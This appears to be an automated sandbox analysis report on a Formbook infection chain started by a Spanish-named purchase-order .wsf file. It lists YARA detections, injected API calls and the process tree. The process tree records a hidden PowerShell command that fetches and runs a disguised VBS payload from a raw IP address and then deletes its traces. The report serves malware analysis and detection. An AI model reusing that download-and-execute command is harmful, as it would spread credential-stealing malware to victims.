Source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.powershell.exe.181ccfb0000.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 12.2.powershell.exe.181b4def050.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.powershell.exe.181b586e7e0.2.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 12.2.powershell.exe.181b586e7e0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.451218272.00000181CCFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 0000000C.00000002.449357348.00000181C4CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.477642007.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: Process Memory Space: powershell.exe PID: 6096, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 2328, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 2328, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5076, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: String function: 0405B150 appears 72 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0291B150 appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00418AA0 NtCreateFile, 15_2_00418AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00418B50 NtReadFile, 15_2_00418B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00418BD0 NtClose, 15_2_00418BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00418C80 NtAllocateVirtualMemory, 15_2_00418C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00418A9A NtCreateFile, 15_2_00418A9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_00418BCA NtReadFile, 15_2_00418BCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959A00 NtProtectVirtualMemory,LdrInitializeThunk, 15_2_02959A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959A20 NtResumeThread,LdrInitializeThunk, 15_2_02959A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959A50 NtCreateFile,LdrInitializeThunk, 15_2_02959A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029598F0 NtReadVirtualMemory,LdrInitializeThunk, 15_2_029598F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959840 NtDelayExecution,LdrInitializeThunk, 15_2_02959840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959860 NtQuerySystemInformation,LdrInitializeThunk, 15_2_02959860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029599A0 NtCreateSection,LdrInitializeThunk, 15_2_029599A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959910 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_02959910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029596E0 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_029596E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959660 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_02959660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959780 NtMapViewOfSection,LdrInitializeThunk, 15_2_02959780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029597A0 NtUnmapViewOfSection,LdrInitializeThunk, 15_2_029597A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959FE0 NtCreateMutant,LdrInitializeThunk, 15_2_02959FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959710 NtQueryInformationToken,LdrInitializeThunk, 15_2_02959710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029595D0 NtClose,LdrInitializeThunk, 15_2_029595D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959540 NtReadFile,LdrInitializeThunk, 15_2_02959540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959A80 NtOpenDirectoryObject, 15_2_02959A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959A10 NtQuerySection, 15_2_02959A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0295A3B0 NtGetContextThread, 15_2_0295A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959B00 NtSetValueKey, 15_2_02959B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029598A0 NtWriteVirtualMemory, 15_2_029598A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959820 NtEnumerateKey, 15_2_02959820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0295B040 NtSuspendThread, 15_2_0295B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029599D0 NtCreateProcessEx, 15_2_029599D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959950 NtQueueApcThread, 15_2_02959950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029596D0 NtCreateKey, 15_2_029596D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959610 NtEnumerateValueKey, 15_2_02959610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959650 NtQueryValueKey, 15_2_02959650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959670 NtQueryInformationProcess, 15_2_02959670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0295A710 NtOpenProcessToken, 15_2_0295A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959730 NtQueryVirtualMemory, 15_2_02959730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959770 NtSetInformationFile, 15_2_02959770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0295A770 NtOpenThread, 15_2_0295A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959760 NtOpenProcess, 15_2_02959760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_029595F0 NtQueryInformationFile, 15_2_029595F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0295AD30 NtSetContextThread, 15_2_0295AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959520 NtWaitForSingleObject, 15_2_02959520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_02959560 NtWriteFile, 15_2_02959560
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099540 NtReadFile,LdrInitializeThunk, 27_2_04099540
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040995D0 NtClose,LdrInitializeThunk, 27_2_040995D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099650 NtQueryValueKey,LdrInitializeThunk, 27_2_04099650
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099660 NtAllocateVirtualMemory,LdrInitializeThunk, 27_2_04099660
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040996D0 NtCreateKey,LdrInitializeThunk, 27_2_040996D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040996E0 NtFreeVirtualMemory,LdrInitializeThunk, 27_2_040996E0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099710 NtQueryInformationToken,LdrInitializeThunk, 27_2_04099710
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099780 NtMapViewOfSection,LdrInitializeThunk, 27_2_04099780
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099FE0 NtCreateMutant,LdrInitializeThunk, 27_2_04099FE0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099840 NtDelayExecution,LdrInitializeThunk, 27_2_04099840
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099860 NtQuerySystemInformation,LdrInitializeThunk, 27_2_04099860
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099910 NtAdjustPrivilegesToken,LdrInitializeThunk, 27_2_04099910
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040999A0 NtCreateSection,LdrInitializeThunk, 27_2_040999A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099A50 NtCreateFile,LdrInitializeThunk, 27_2_04099A50
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099520 NtWaitForSingleObject, 27_2_04099520
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0409AD30 NtSetContextThread, 27_2_0409AD30
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099560 NtWriteFile, 27_2_04099560
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040995F0 NtQueryInformationFile, 27_2_040995F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099610 NtEnumerateValueKey, 27_2_04099610
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099670 NtQueryInformationProcess, 27_2_04099670
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0409A710 NtOpenProcessToken, 27_2_0409A710
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099730 NtQueryVirtualMemory, 27_2_04099730
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099760 NtOpenProcess, 27_2_04099760
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0409A770 NtOpenThread, 27_2_0409A770
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099770 NtSetInformationFile, 27_2_04099770
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040997A0 NtUnmapViewOfSection, 27_2_040997A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099820 NtEnumerateKey, 27_2_04099820
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0409B040 NtSuspendThread, 27_2_0409B040
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040998A0 NtWriteVirtualMemory, 27_2_040998A0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040998F0 NtReadVirtualMemory, 27_2_040998F0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099950 NtQueueApcThread, 27_2_04099950
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040999D0 NtCreateProcessEx, 27_2_040999D0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099A00 NtProtectVirtualMemory, 27_2_04099A00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099A10 NtQuerySection, 27_2_04099A10
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099A20 NtResumeThread, 27_2_04099A20
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099A80 NtOpenDirectoryObject, 27_2_04099A80
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_04099B00 NtSetValueKey, 27_2_04099B00
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0409A3B0 NtGetContextThread, 27_2_0409A3B0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_03228B50 NtReadFile, 27_2_03228B50
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_03228BD0 NtClose, 27_2_03228BD0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_03228AA0 NtCreateFile, 27_2_03228AA0
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_03228C80 NtAllocateVirtualMemory, 27_2_03228C80
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_03228BCA NtReadFile, 27_2_03228BCA
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_03228A9A NtCreateFile, 27_2_03228A9A
Source: NUEVA ORDEN DE COMPRA 80107.wsf Initial sample: Strings found which are bigger than 50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NUEVA ORDEN DE COMPRA 80107.wsf"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'http://2.56.57.22/daveCrpted.jpg' -o C:\Windows\Temp\Done.vbs;explorer.exe C:\Windows\Temp\Done.vbs;Start-Sleep 1;rm *.vbs,*.wsf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" C:\Windows\Temp\Done.vbs
Source: unknown Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\Done.vbs"
